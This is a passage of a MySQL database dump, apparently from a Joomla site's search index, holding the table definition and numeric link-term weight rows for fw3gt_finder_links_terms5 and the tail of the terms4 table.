4849,1646997,0.37331),(4849,1646998,1.07331),(4849,1646999,1.12),(4849,1647000,0.56),(4849,1647001,0.93331),(4849,1647002,1.07331),(4849,1647003,0.98),(4849,1647004,1.09669),(4849,1647005,0.32669),(4849,1647006,1.14331),(4849,1647007,1.23669),(4849,1647401,0.28),(4849,1647402,0.86331),(4849,1647403,1.09669),(4849,1647404,0.84),(4849,1647405,1.14331),(4849,1647406,0.86331),(4849,1647407,1.07331),(4849,1647408,1.07331),(4849,1647409,1.14331),(4849,1647410,2.09661),(4849,1647411,2.32339),(4849,1647412,0.84),(4849,1647413,1.07331),(4849,1647414,0.95669),(4849,1647415,0.93331),(4849,1647416,1.14331),(4849,1647417,0.18669),(4849,1647418,0.84),(4849,1647419,0.98),(4850,1647950,2.38),(4928,1647950,2.38),(4951,1647950,2.38),(4850,1647951,3.11661),(4928,1647951,3.11661),(4951,1647951,3.11661),(4852,1648072,0.95669),(4909,1672193,2.9332),(4909,1672194,6.4),(4909,1672195,7.0668),(4909,1672237,0.18669),(4909,1672238,0.93331),(4909,1672239,1.07331),(4917,1678857,0.21),(4917,1678858,0.95669),(4917,1678859,0.21),(4917,1678860,0.95669),(4917,1678861,1.14331),(4917,1678862,3.4668),(4917,1678903,0.56),(4917,1678904,1.14331),(4917,1678905,1.19),(4917,1678906,0.23331),(4917,1678907,1.12),(4917,1678908,1.28331),(4917,1678909,1.05),(4917,1678910,1.09669),(4917,1678911,0.37331),(4917,1678912,1.09669),(4917,1678913,1.4),(4917,1679339,0.91),(4917,1679340,1.12),(4917,1679341,0.95669),(4917,1679342,1.14331),(4924,1680547,1.6),(4924,1680548,5.3332),(4924,1680549,5.6),(4927,1682711,1.6),(4927,1682712,5.4668),(4927,1682798,1.02669),(4927,1682799,1.33),(4927,1682800,1.14331),(4927,1682801,1.19),(4927,1683233,0.42),(4927,1683234,1.14331),(4927,1683235,1.4),(4935,1684026,1.3332),(4938,1686133,5.7332),(4938,1686134,6.2668),(4938,1686148,1.12),(4938,1686149,1.37669),(4938,1686150,0.28),(4938,1686151,1.05),(4938,1686152,1.12),(4938,1686580,0.18669),(4938,1686581,0.95669),(4938,1686582,0.98),(4938,1686583,1.05),(4938,1686584,1.00331),(4938,1686585,1.12),(4940,1688153,2.00662),(4940,1688197,1.6),(4940,1688198,6),(4940,1688199,6.9332),(4940,1688219,2.1332),(4940,1688220,6),(4940,1688221,6.4),(4940,1688246,0.09331),(4940,1688247,0.95669),(4940,1688248,1.07331),(4940,1688249,0.46669),(4940,1688250,1.09669),(4940,1688251,1.14331),(4940,1688252,0.28),(4940,1688253,0.98),(4940,1688254,1.21331),(4940,1688255,1.07331),(4940,1688256,1.33),(4940,1688688,0.84),(4940,1688689,0.91),(4940,1688690,0.91),(4940,1688691,1.14331),(4940,1688692,0.28),(4940,1688693,1.07331),(4940,1688694,1.26),(4951,1689383,0.8),(4955,1689474,3.1334),(4956,1689508,0.90661),(4956,1689509,2.49339),(4956,1689510,2.83339);
/*!40000 ALTER TABLE `fw3gt_finder_links_terms4` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links_terms5`
--

DROP TABLE IF EXISTS `fw3gt_finder_links_terms5`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links_terms5` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links_terms5`
--

LOCK TABLES `fw3gt_finder_links_terms5` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links_terms5` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links_terms5` VALUES (4571,1523654,0.09331),(4616,1523654,0.09331),(4777,1523654,0.09331),(4803,1523654,0.09331),(4852,1523654,0.09331),(4909,1523654,0.09331),(4594,1523654,0.18662),(4617,1523654,0.18662),(4734,1523654,0.18662),(4849,1523654,0.18662),(4917,1523654,0.18662),(4938,1523654,0.18662),(4940,1523654,0.18662),(4574,1523654,0.22661),(4591,1523654,0.22661),(4593,1523654,0.22661),(4635,1523654,0.22661),(4653,1523654,0.22661),(4723,1523654,0.22661),(4764,1523654,0.22661),(4809,1523654,0.22661),(4626,1523654,0.27993),(4625,1523654,0.46655),(4927,1523654,0.46655),(4710,1523654,0.55986),(4608,1523654,0.74648),(4614,1523654,0.74648),(4604,1523654,0.9331),(4658,1523654,0.9331),(4721,1523654,0.97309),(4723,1523655,2.04),(4764,1523655,2.04),(4723,1523656,2.21),(4764,1523656,2.21),(4569,1524786,0.04669),(4571,1524786,0.04669),(4572,1524786,0.04669),(4661,1524786,0.04669),(4669,1524786,0.04669),(4721,1524786,0.04669),(4741,1524786,0.04669),(4839,1524786,0.04669),(4847,1524786,0.04669),(4852,1524786,0.04669),(4749,1524786,0.09338),(4753,1524786,0.09338),(4851,1524786,0.09338),(4734,1524786,0.18676),(4569,1524787,0.98),(4571,1524787,0.98),(4572,1524787,0.98),(4661,1524787,0.98),(4669,1524787,0.98),(4741,1524787,0.98),(4749,1524787,0.98),(4753,1524787,0.98),(4839,1524787,0.98),(4847,1524787,0.98),(4851,1524787,0.98),(4852,1524787,0.98),(4569,1524788,1.19),(4571,1524788,1.19),(4572,1524788,1.19),(4661,1524788,1.19),(4669,1524788,1.19),(4741,1524788,1.19),(4749,1524788,1.19),(4753,1524788,1.19),(4839,1524788,1.19),(4847,1524788,1.19),(4851,1524788,1.19),(4852,1524788,1.19),(4569,1524811,0.18669),(4571,1524811,0.18669),(4572,1524811,0.18669),(4661,1524811,0.18669),(4669,1524811,0.18669),(4741,1524811,0.18669),(4749,1524811,0.18669),(4753,1524811,0.18669),(4839,1524811,0.18669),(4847,1524811,0.18669),(4851,1524811,0.18669),(4852,1524811,0.18669),(4857,1524811,0.18669),(4569,1524812,0.98),(4571,1524812,0.98),(4572,1524812,0.98),(4661,1524812,0.98),(4669,1524812,0.98),(4741,1524812,0.98),(4749,1524812,0.98),(4753,1524812,0.98),(4839,1524812,0.98),(4847,1524812,0.98),(4851,1524812,0.98),(4852,1524812,0.98),(4857,1524812,0.98),(4569,1524813,1.19),(4571,1524813,1.19),(4572,1524813,1.19),(4661,1524813,1.19),(4669,1524813,1.19),(4741,1524813,1.19),(4749,1524813,1.19),(4753,1524813,1.19),(4851,1524813,1.19),(4852,1524813,1.19),(4569,1524839,0.51331),(4571,1524839,0.51331),(4572,1524839,0.51331),(4661,1524839,0.51331),(4669,1524839,0.51331),(4741,1524839,0.51331),(4749,1524839,0.51331),(4753,1524839,0.51331),(4851,1524839,0.51331),(4852,1524839,0.51331),(4569,1524840,1.21331),(4571,1524840,1.21331),(4572,1524840,1.21331),(4661,1524840,1.21331),(4669,1524840,1.21331),(4569,1524841,1.35331),(4571,1524841,1.35331),(4572,1524841,1.35331),(4661,1524841,1.35331),(4571,1525002,0.86331),(4571,1525003,1.02669),(4574,1525116,0.68),(4574,1525117,2.43661),(4574,1525118,2.72),(4574,1525121,2.21),(4574,1525122,2.60661),(4762,1525171,0.37331),(4591,1527332,2.15339),(4593,1527411,2.15339),(4593,1527412,2.83339),(4594,1527562,0.42),(4616,1527562,0.42),(4693,1527562,0.42),(4762,1527562,0.42),(4653,1527562,1.02),(4761,1527562,1.26),(4658,1527562,3.36),(4594,1527563,1.14331),(4917,1527564,0.51331),(4938,1527564,0.51331),(4594,1527564,1.24661),(4594,1527565,2.60661),(4594,1527566,3.06),(4594,1527567,0.56),(4938,1527567,0.56),(4940,1527567,0.56),(4594,1527568,1.12),(4594,1527569,1.35331),(4594,1527570,0.46669),(4594,1527571,1.09669),(4594,1527572,1.23669),(4594,1527646,1.00331),(4594,1527647,1.07331),(4594,1527648,0.95669),(4594,1527649,1.00331),(4594,1527650,0.28),(4594,1527651,0.95669),(4594,1527652,1.07331),(4594,1527653,0.32669),(4594,1527654,1.00331),(4594,1527655,1.09669),(4594,1527656,0.56),(4594,1527657,1.14331),(4594,1527658,1.28331),(4604,1529431,0.28),(4608,1529431,0.28),(4614,1529431,0.28),(4617,1529431,0.28),(4625,1529431,0.28),(4626,1529431,0.28),(4604,1529432,1.12),(4608,1529432,1.12),(4614,1529432,1.12),(4617,1529432,1.12),(4625,1529432,1.12),(4626,1529432,1.12),(4604,1536212,0.32669),(4614,1536212,0.32669),(4616,1536212,0.32669),(4626,1536212,0.32669),(4604,1536213,0.93331),(4614,1536213,0.93331),(4604,1536214,1.21331),(4614,1536214,1.21331),(4604,1536215,0.46669),(4604,1536216,1.26),(4604,1536217,1.4),(4604,1536218,1.24661),(4604,1536219,2.83339),(4604,1536372,0.74662),(4604,1536373,1.09669),(4604,1536374,1.28331),(4604,1536375,0.98),(4604,1536376,1.37669),(4604,1536377,0.84),(4604,1536378,1.14331),(4604,1536379,1.35331),(4604,1536380,1.05),(4604,1536381,1.23669),(4604,1536382,0.68),(4604,1536383,2.72),(4604,1536384,3.23),(4604,1536385,0.88669),(4604,1536386,1.19),(4604,1536387,1.12),(4604,1536388,1.33),(4604,1536389,1.05),(4625,1536389,1.05),(4604,1536390,1.21331),(4625,1536390,1.21331),(4604,1536391,0.98),(4614,1536391,0.98),(4604,1536392,1.02669),(4604,1536393,0.98),(4604,1536394,1.02669),(4604,1536395,0.98),(4604,1536396,1.14331),(4604,1536397,0.88669),(4604,1536398,1.16669),(4604,1536399,0.95669),(4604,1536400,1.21331),(4604,1536401,1.96),(4604,1536402,1.21331),(4604,1536403,1.12),(4617,1536404,0.23331),(4777,1536404,0.23331),(4849,1536404,0.23331),(4909,1536404,0.23331),(4604,1536404,0.46662),(4940,1536404,0.46662),(4604,1536405,0.98),(4604,1536406,1.21331),(4604,1536407,0.88669),(4604,1536408,1.23669),(4604,1536409,0.28),(4614,1536409,0.84),(4626,1536409,1.4),(4604,1536410,0.91),(4604,1536411,1.05),(4604,1536412,0.37331),(4626,1536412,0.74662),(4604,1536413,0.95669),(4604,1536414,1.28331),(4604,1536415,0.23331),(4617,1536415,0.23331),(4625,1536415,0.23331),(4626,1536415,0.23331),(4604,1536416,1.07331),(4617,1536416,1.07331),(4625,1536416,1.07331),(4626,1536416,1.07331),(4604,1536417,1.16669),(4617,1536417,1.16669),(4625,1536417,1.16669),(4626,1536417,1.16669),(4604,1536418,0.51331),(4617,1536418,0.51331),(4625,1536418,0.51331),(4604,1536419,1.05),(4617,1536419,1.05),(4625,1536419,1.05),(4604,1536420,1.09669),(4617,1536420,1.09669),(4625,1536420,1.09669),(4604,1536421,1.16669),(4625,1536421,1.16669),(4626,1536421,1.16669),(4604,1536422,0.51331),(4604,1536423,1.02669),(4604,1536424,1.26),(4608,1540104,0.32669),(4608,1540105,1.09669),(4608,1540106,1.19),(4608,1540294,0.18669),(4626,1540294,0.18669),(4710,1540294,0.18669),(4777,1540294,0.18669),(4917,1540294,0.18669),(4614,1540294,0.37338),(4721,1540294,0.37338),(4734,1540294,0.74676),(4608,1540295,0.84),(4608,1540296,1.00331),(4608,1540297,0.14),(4608,1540298,0.84),(4608,1540299,0.91),(4608,1540300,0.09331),(4614,1540300,0.09331),(4608,1540301,0.81669),(4608,1540302,0.88669),(4608,1540303,0.84),(4608,1540304,2.19338),(4608,1540305,2.33338),(4608,1540306,0.32669),(4608,1540307,0.95669),(4608,1540308,1.02669),(4608,1540309,0.32669),(4608,1540310,1.00331),(4608,1540311,1.16669),(4614,1540312,0.09331),(4608,1540312,0.18662),(4624,1540312,0.27993),(4798,1540312,0.27993),(4626,1540312,0.9331),(4608,1540313,1.02669),(4608,1540314,1.23669),(4608,1540315,0.95669),(4608,1540316,1.14331),(4608,1540317,0.65338),(4614,1540317,1.30676),(4608,1540318,0.95669),(4608,1540319,1.02669),(4608,1540320,0.93331),(4608,1540321,1.00331),(4608,1540322,0.32669),(4608,1540323,0.93331),(4608,1540324,1.00331),(4608,1540325,0.74662),(4614,1540325,0.90661),(4608,1540326,2.14662),(4608,1540327,2.66),(4608,1540328,0.93338),(4608,1540329,2.28662),(4608,1540330,2.70662),(4608,1540331,0.65331),(4608,1540332,1.35331),(4608,1540333,1.4),(4608,1540334,0.65338),(4608,1540335,2.19338),(4608,1540336,2.61338),(4608,1540595,0.88669),(4721,1540595,0.88669),(4608,1540596,1.02669),(4608,1540597,0.91),(4608,1540598,1.12),(4608,1540599,2.19338),(4608,1540600,2.28662),(4608,1540601,0.91),(4608,1540602,1.26),(4608,1540603,2.00662),(4608,1540604,2.47338),(4608,1540605,1.00331),(4608,1540606,1.12),(4608,1540607,0.51331),(4614,1540607,0.51331),(4626,1540607,1.02662),(4608,1540608,1.05),(4626,1540608,2.1),(4608,1540609,1.09669),(4608,1540610,1.19),(4614,1540610,1.19),(4608,1540611,0.65338),(4608,1540612,0.91),(4608,1540613,0.95669),(4608,1540614,1.21331),(4608,1540615,1.28331),(4614,1546576,1.00331),(4614,1546577,1.16669),(4614,1546578,0.95669),(4614,1546579,1.16669),(4614,1546580,0.95669),(4614,1546581,1.07331),(4614,1546582,0.60669),(4614,1546583,1.05),(4614,1546584,1.28331),(4614,1546585,0.93331),(4614,1546586,1.12),(4614,1546587,0.93331),(4614,1546588,1.02669),(4614,1546589,0.93331),(4614,1546590,1.02669),(4614,1546591,0.95669),(4614,1546592,1.02669),(4614,1546593,0.98),(4614,1546594,1.05),(4614,1546595,0.56),(4614,1546596,0.88669),(4614,1546597,1.12),(4614,1546598,1.07331),(4614,1546599,1.28331),(4614,1546600,0.32669),(4693,1546600,0.32669),(4934,1546600,0.32669),(4614,1546601,0.95669),(4614,1546602,1.09669),(4614,1546603,0.37331),(4614,1546604,1.07331),(4614,1546605,1.12),(4614,1546606,2.72),(4614,1546607,1.40007),(4614,1546608,1.16669),(4614,1546609,1.4),(4614,1546610,0.98),(4614,1546611,1.23669),(4614,1546612,0.98),(4614,1546613,1.14331),(4614,1546614,0.51331),(4614,1546615,1.19),(4614,1546616,1.4),(4614,1546617,0.18669),(4614,1546618,0.93331),(4614,1546619,1.12),(4614,1546620,0.56),(4614,1546621,1.09669),(4614,1546622,1.30669),(4614,1546623,1.14331),(4614,1546624,1.4),(4614,1546625,0.56),(4614,1546626,0.93331),(4614,1546627,1.19),(4614,1546628,1.07331),(4614,1546629,1.28331),(4624,1546630,0.28),(4798,1546630,0.28),(4614,1546630,0.84),(4614,1546631,0.98),(4614,1546632,1.26),(4614,1546633,0.91),(4614,1546634,1.09669),(4614,1546635,0.88669),(4614,1546636,1.02669),(4614,1546637,0.60669),(4614,1546638,1.21331),(4614,1546639,1.4),(4614,1546640,0.23331),(4614,1546641,0.88669),(4614,1546642,1.12),(4614,1546643,0.28),(4626,1546643,0.28),(4614,1546644,0.88669),(4614,1546645,1.07331),(4614,1547016,0.28),(4614,1547017,0.95669),(4614,1547018,1.02669),(4614,1547019,0.86331),(4614,1547020,0.91),(4614,1547021,1.09669),(4614,1547022,1.14331),(4614,1547023,0.93331),(4614,1547024,1.12),(4614,1547025,1.00331),(4614,1547026,1.26),(4614,1547027,1.35331),(4614,1547028,1.00331),(4614,1547029,1.14331),(4614,1547030,1.00331),(4614,1547031,1.28331),(4614,1547032,0.91),(4614,1547033,1.00331),(4614,1547034,1.77338),(4614,1547035,2.05338),(4614,1547036,1.07331),(4614,1547037,1.37669),(4614,1547038,0.32669),(4614,1547039,1.07331),(4614,1547040,1.19),(4614,1547041,0.32669),(4614,1547042,0.91),(4614,1547043,1.09669),(4614,1547044,0.18669),(4614,1547045,1.00331),(4614,1547046,1.23669),(4614,1547047,1.02669),(4614,1547048,1.14331),(4614,1547049,0.46669),(4614,1547050,1.14331),(4614,1547051,1.35331),(4614,1547052,0.42),(4614,1547053,1.07331),(4614,1547054,1.19),(4614,1547055,0.46669),(4614,1547056,1.23669),(4614,1547057,1.4),(4614,1547058,0.42),(4614,1547059,1.00331),(4614,1547060,1.07331),(4616,1547878,1.05),(4616,1547879,1.09669),(4616,1547880,0.37331),(4616,1547881,1.07331),(4616,1547882,1.33),(4616,1547883,1.09669),(4616,1547884,1.14331),(4616,1548002,1.13339),(4616,1548003,3.28661),(4616,1548004,3.4),(4616,1548005,1.05),(4616,1548006,1.35331),(4616,1548007,0.32669),(4616,1548008,1.14331),(4616,1548009,1.21331),(4616,1548010,0.65331),(4616,1548011,1.07331),(4616,1548012,1.14331),(4616,1548013,0.32669),(4616,1548014,1.05),(4616,1548015,1.33),(4616,1548016,0.28),(4616,1548017,1.07331),(4616,1548018,1.16669),(4616,1548019,0.46669),(4616,1548020,1.23669),(4616,1548021,1.30669),(4616,1548022,0.51331),(4616,1548023,1.23669),(4616,1548024,1.4),(4617,1548334,0.23331),(4617,1548335,0.86331),(4617,1548336,1.02669),(4617,1548337,0.32669),(4938,1548337,0.32669),(4940,1548337,0.32669),(4721,1548337,0.65338),(4617,1548338,1.02669),(4617,1548339,1.16669),(4617,1548436,1.05),(4617,1548437,1.26),(4617,1548438,0.91),(4617,1548439,0.95669),(4617,1548440,0.37331),(4617,1548441,1.07331),(4617,1548442,1.19),(4617,1548443,0.37331),(4617,1548444,1.14331),(4617,1548445,1.26),(4617,1548446,0.37331),(4617,1548447,1.07331),(4617,1548448,1.23669),(4617,1548449,0.86331),(4617,1548450,1.14331),(4617,1548451,1.26),(4617,1548452,0.28),(4626,1548452,0.28),(4803,1548452,0.28),(4625,1548452,0.56),(4617,1548453,0.88669),(4617,1548454,1.02669),(4798,1554187,0.04669),(4624,1554187,0.18676),(4624,1554188,0.88669),(4624,1554189,1.23669),(4624,1554190,0.88669),(4624,1554191,1.28331),(4624,1554192,2.1),(4624,1554193,1.26),(4624,1554194,1.28331),(4624,1554195,1.77338),(4624,1554196,0.98),(4624,1554197,0.93331),(4624,1554198,0.88669),(4798,1554198,2.66007),(4624,1554199,1.00331),(4798,1554199,1.00331),(4624,1554200,0.65331),(4624,1554201,1.16669),(4624,1554202,1.33),(4624,1554203,0.28),(4624,1554204,0.93331),(4624,1554205,1.07331),(4624,1554206,0.32669),(4624,1554207,1.28331),(4624,1554208,1.4),(4624,1554209,0.28),(4624,1554210,1.12),(4624,1554211,1.28331),(4624,1554212,0.56),(4798,1554212,0.56),(4624,1554213,1.09669),(4624,1554214,1.14331),(4624,1554215,0.46662),(4624,1554216,0.91),(4624,1554217,1.14331),(4624,1554218,0.86331),(4624,1554219,1.07331),(4624,1554220,0.88669),(4624,1554221,1.19),(4624,1554444,0.18669),(4798,1554444,0.18669),(4624,1554445,0.84),(4624,1554446,1.35331),(4624,1554447,0.28),(4624,1554448,1.12),(4624,1554449,1.21331),(4624,1554450,0.51331),(4624,1554451,1.02669),(4624,1554452,1.09669),(4624,1554453,0.60669),(4624,1554454,1.26),(4624,1554455,1.4),(4624,1554456,0.56),(4624,1554457,1.21331),(4624,1554458,1.4),(4625,1555091,0.46669),(4625,1555092,0.98),(4625,1555093,1.14331),(4625,1555094,0.23331),(4625,1555095,0.91),(4625,1555096,1.05),(4625,1555097,0.32669),(4625,1555098,0.91),(4625,1555099,1.02669),(4625,1555100,0.32669),(4625,1555101,0.98),(4625,1555102,1.21331),(4625,1555103,0.74662),(4625,1555104,1.07331),(4625,1555105,1.21331),(4625,1555106,1.16669),(4625,1555107,1.4),(4625,1555108,0.42),(4625,1555109,1.05),(4625,1555110,1.30669),(4625,1555111,0.28),(4625,1555112,0.95669),(4625,1555113,1.26),(4625,1555114,0.32669),(4625,1555115,1.02669),(4625,1555116,1.21331),(4625,1555117,0.96),(4625,1555118,0.91),(4625,1555119,1.19),(4625,1555120,0.56),(4625,1555121,0.93331),(4625,1555122,1.23669),(4625,1555123,0.91),(4625,1555124,1.07331),(4625,1555125,0.28),(4625,1555126,1.05),(4625,1555127,1.09669),(4625,1555398,0.18669),(4625,1555399,0.93331),(4625,1555400,1.07331),(4625,1555401,0.95669),(4625,1555402,1.14331),(4625,1555403,1.05),(4625,1555404,1.19),(4625,1555405,1.00331),(4625,1555406,1.16669),(4625,1555407,0.84),(4625,1555408,1.05),(4625,1555409,0.93331),(4625,1555410,1.07331),(4625,1555411,1.19),(4625,1555412,1.26),(4625,1555413,0.32669),(4625,1555414,1.00331),(4625,1555415,1.09669),(4625,1555416,0.28),(4927,1555416,0.56),(4625,1555417,0.91),(4625,1555418,0.98),(4626,1555877,0.23331),(4626,1555878,0.98),(4626,1555879,1.09669),(4626,1556048,0.32669),(4626,1556049,0.91),(4626,1556050,1.09669),(4626,1556390,0.84),(4626,1556391,1.02669),(4626,1556392,0.32669),(4626,1556393,1.14331),(4626,1556394,1.35331),(4626,1556395,0.28),(4626,1556396,0.91),(4626,1556397,1.16669),(4626,1556398,0.23331),(4626,1556399,1.02669),(4626,1556400,1.09669),(4626,1556401,1.77338),(4626,1556402,0.95669),(4626,1556403,1.09669),(4626,1556404,6.90648),(4626,1556405,4.9),(4626,1556406,2.94),(4626,1556407,0.32669),(4626,1556408,1.05),(4626,1556409,1.14331),(4626,1556410,0.7),(4626,1556411,1.14331),(4626,1556412,1.26),(4626,1556413,0.14),(4626,1556414,0.88669),(4626,1556415,1.28331),(4626,1556416,1.21338),(4626,1556417,1.05),(4626,1556418,1.35331),(4626,1556419,1.07331),(4626,1556420,1.35331),(4626,1556421,0.42),(4626,1556422,1.14331),(4626,1556423,1.33),(4626,1556424,1.00331),(4626,1556425,1.05),(4626,1556426,0.56),(4626,1556427,1.02669),(4626,1556428,1.23669),(4626,1556429,0.46662),(4626,1556430,0.88669),(4626,1556431,1.12),(4626,1556432,1.02669),(4626,1556433,1.23669),(4626,1556434,0.23331),(4626,1556435,0.88669),(4626,1556436,1.21331),(4626,1556437,0.42),(4626,1556438,1.14331),(4626,1556439,1.37669),(4626,1556440,0.42),(4626,1556441,1.09669),(4626,1556442,1.23669),(4626,1556443,0.37331),(4626,1556444,1.00331),(4626,1556445,1.19),(4626,1556446,0.32669),(4626,1556447,0.93331),(4626,1556448,1.23669),(4626,1556449,0.23331),(4626,1556450,1.05),(4626,1556451,1.21331),(4626,1556452,0.23331),(4626,1556453,1.00331),(4626,1556454,1.07331),(4626,1556455,0.28),(4626,1556456,0.91),(4626,1556457,1.07331),(4626,1556458,1.21338),(4626,1556459,1.14331),(4626,1556460,1.19),(4626,1556461,1.23669),(4626,1556462,1.37669),(4626,1556463,1.09669),(4626,1556464,1.37669),(4626,1556465,0.65338),(4626,1556466,2.38),(4626,1556467,1.33),(4626,1556468,1.4),(4626,1556469,0.65331),(4626,1556470,1.14331),(4626,1556471,1.26),(4626,1556771,0.93345),(4626,1556772,0.93331),(4626,1556773,1.00331),(4626,1556774,0.93331),(4626,1556775,1.00331),(4626,1556776,0.98),(4626,1556777,1.05),(4626,1556778,2.00662),(4626,1556779,2.42662),(4626,1556780,0.56007),(4626,1556781,0.98),(4626,1556782,1.05),(4626,1556783,1.91338),(4626,1556784,2.05338),(4626,1556785,0.91),(4626,1556786,1.16669),(4626,1556787,0.95669),(4626,1556788,1.26),(4626,1556789,1.00331),(4626,1556790,1.26),(4626,1556791,0.91),(4626,1556792,1.05),(4626,1556793,0.93331),(4626,1556794,1.26),(4626,1556795,3.00993),(4626,1556796,3.21993),(4626,1556797,1.07331),(4626,1556798,1.16669),(4626,1556799,0.93331),(4626,1556800,1.09669),(4626,1556801,0.84),(4626,1556802,1.96),(4626,1556803,2.1),(4626,1556804,0.98),(4626,1556805,1.23669),(4626,1556806,0.32669),(4626,1556807,1.00331),(4626,1556808,1.09669),(4626,1556809,1.09669),(4626,1556810,1.09669),(4626,1556811,0.32669),(4626,1556812,1.00331),(4626,1556813,1.26),(4626,1556814,1.02669),(4626,1556815,1.35331),(4626,1556816,0.18669),(4626,1556817,0.98),(4626,1556818,1.02669),(4626,1556819,0.51331),(4626,1556820,1.21331),(4626,1556821,1.26),(4626,1556822,0.37331),(4626,1556823,1.05),(4626,1556824,1.12),(4626,1556825,0.37331),(4626,1556826,1.02669),(4626,1556827,1.23669),(4626,1556828,0.18669),(4626,1556829,0.84),(4626,1556830,1.02669),(4635,1558523,0.28),(4635,1558524,1.00331),(4635,1558525,1.09669),(4635,1558545,2.55),(4635,1558546,3.23),(4669,1559066,1.33),(4653,1560673,2.72),(4658,1560673,8.96),(4653,1560674,2.94661),(4653,1560709,2.04),(4653,1560710,2.49339),(4658,1563011,1.21331),(4658,1563012,1.21331),(4658,1563013,2.42662),(4658,1563014,1.21331),(4658,1563015,1.21331),(4658,1563016,1.19),(4658,1563017,1.19),(4658,1563018,0.32669),(4658,1563019,0.91),(4658,1563020,1.09669),(4658,1563021,0.60669),(4658,1563022,1.14331),(4658,1563023,1.19),(4658,1563024,0.56),(4658,1563025,1.19),(4658,1563026,1.26),(4658,1563027,0.65331),(4658,1563028,1.19),(4658,1563029,1.30669),(4658,1563122,1.58662),(4658,1563123,1.96),(4658,1563124,1.58662),(4658,1563125,1.96),(4658,1563126,1.58662),(4658,1563127,1.02669),(4658,1563128,1.00331),(4658,1563129,0.79331),(4658,1563130,1.02669),(4658,1563131,1.05),(4658,1563132,1.21331),(4658,1563133,1.09669),(4658,1563134,1.26),(4658,1563135,0.95669),(4658,1563136,1.12),(4734,1564287,0.51331),(4734,1564288,1.09669),(4673,1564877,1.24661),(4673,1564878,2.66339),(4673,1564879,3.28661),(4673,1564892,1.13339),(4673,1564893,2.83339),(4673,1564894,3.28661),(4732,1565382,0.42),(4734,1565382,0.42),(4678,1565382,1.02),(4678,1565383,2.38),(4678,1565384,2.55),(4678,1565385,1.58661),(4678,1565386,2.89),(4678,1565387,3.4),(4693,1569331,1.14331),(4693,1569332,1.28331),(4693,1569333,0.28),(4734,1569333,0.56),(4693,1569334,1.02669),(4693,1569335,1.30669),(4693,1569336,1.02669),(4693,1569337,1.19),(4710,1584464,0.28),(4721,1584464,1.12),(4710,1592406,1.05),(4710,1592407,1.26),(4710,1592408,0.91),(4710,1592409,0.98),(4710,1592410,0.37331),(4710,1592411,1.12),(4710,1592412,1.33),(4710,1592413,0.37331),(4710,1592414,1.07331),(4710,1592415,1.33),(4710,1592416,0.18669),(4734,1592416,0.18669),(4710,1592417,1.02669),(4710,1592418,1.21331),(4710,1592419,0.56),(4710,1592420,1.26),(4710,1592421,1.33),(4710,1592422,0.28),(4710,1592619,0.98),(4710,1592620,1.23669),(4710,1592621,0.98),(4710,1592622,1.28331),(4710,1592623,0.91),(4710,1592624,1.07331),(4710,1592625,0.86331),(4710,1592626,1.12),(4710,1592627,0.91),(4710,1592628,0.98),(4710,1592629,0.88669),(4710,1592630,0.95669),(4710,1592631,0.65331),(4710,1592632,1.28331),(4710,1592633,1.4),(4710,1592634,0.60669),(4710,1592635,1.26),(4710,1592636,1.37669),(4710,1592637,0.42),(4710,1592638,1.00331),(4710,1592639,1.21331),(4710,1592640,0.23331),(4710,1592641,1.05),(4710,1592642,1.19),(4710,1592643,0.14),(4734,1592643,0.28),(4710,1592644,1.00331),(4710,1592645,1.19),(4710,1592646,0.18669),(4710,1592647,0.86331),(4710,1592648,1.02669),(4710,1592649,1.11993),(4710,1592650,0.93331),(4710,1592651,1.09669),(4710,1592652,1.14331),(4710,1592653,1.35331),(4710,1592654,0.93331),(4710,1592655,1.05),(4710,1592656,0.37331),(4710,1592657,1.07331),(4710,1592658,1.28331),(4710,1592659,0.37331),(4710,1592660,1.07331),(4710,1592661,1.30669),(4721,1602926,0.42),(4721,1602927,1.14331),(4721,1602928,1.21331),(4721,1602929,0.28),(4721,1602930,0.91),(4721,1602931,1.09669),(4721,1602932,0.18669),(4721,1602933,0.91),(4721,1602934,1.09669),(4721,1602935,0.42),(4721,1602936,1.21331),(4721,1602937,1.4),(4721,1602938,0.86331),(4721,1602939,0.93331),(4803,1603337,0.04669),(4924,1603337,0.11339),(4940,1603337,0.11339),(4721,1603337,0.18676),(4734,1603337,0.28014),(4721,1603338,0.91),(4721,1603339,1.05),(4721,1603340,0.93331),(4721,1603341,1.00331),(4721,1603342,0.79331),(4734,1603342,0.79331),(4721,1603343,1.00331),(4721,1603344,0.91),(4721,1603345,1.12),(4721,1603346,0.14),(4721,1603347,0.84),(4721,1603348,0.91),(4721,1603349,1.02669),(4721,1603350,1.21331),(4721,1603351,1.05),(4721,1603352,1.21331),(4721,1603353,0.46669),(4721,1603354,1.05),(4721,1603355,1.26),(4721,1603356,0.37331),(4721,1603357,0.95669),(4721,1603358,1.12),(4721,1603359,0.28),(4721,1603360,1.02669),(4721,1603361,1.28331),(4721,1603362,2.24),(4721,1603363,2.56662),(4721,1603364,0.23331),(4721,1603365,0.98),(4721,1603366,1.23669),(4721,1603367,1.63345),(4721,1603368,0.95669),(4721,1603369,1.19),(4721,1603370,1.02669),(4721,1603371,1.07331),(4721,1603372,1.30669),(4721,1603373,1.4),(4721,1603374,0.93331),(4721,1603375,1.07331),(4721,1603376,0.93331),(4721,1603377,1.00331),(4721,1603378,1.12),(4721,1603379,1.33),(4721,1603380,1.23669),(4721,1603381,1.37669),(4721,1603382,1.07331),(4721,1603383,1.12),(4721,1603384,0.91),(4721,1603385,1.05),(4721,1603386,0.42),(4721,1603387,1.02669),(4721,1603388,1.23669),(4721,1603389,0.37331),(4721,1603390,1.02669),(4721,1603391,1.09669),(4721,1603392,0.42),(4721,1603393,1.12),(4721,1603394,1.19),(4721,1603395,0.93338),(4721,1603396,2.19338),(4721,1603397,1.14331),(4721,1603398,1.37669),(4721,1603399,0.7),(4721,1603400,1.12),(4721,1603401,1.37669),(4721,1603402,0.37331),(4721,1603403,1.07331),(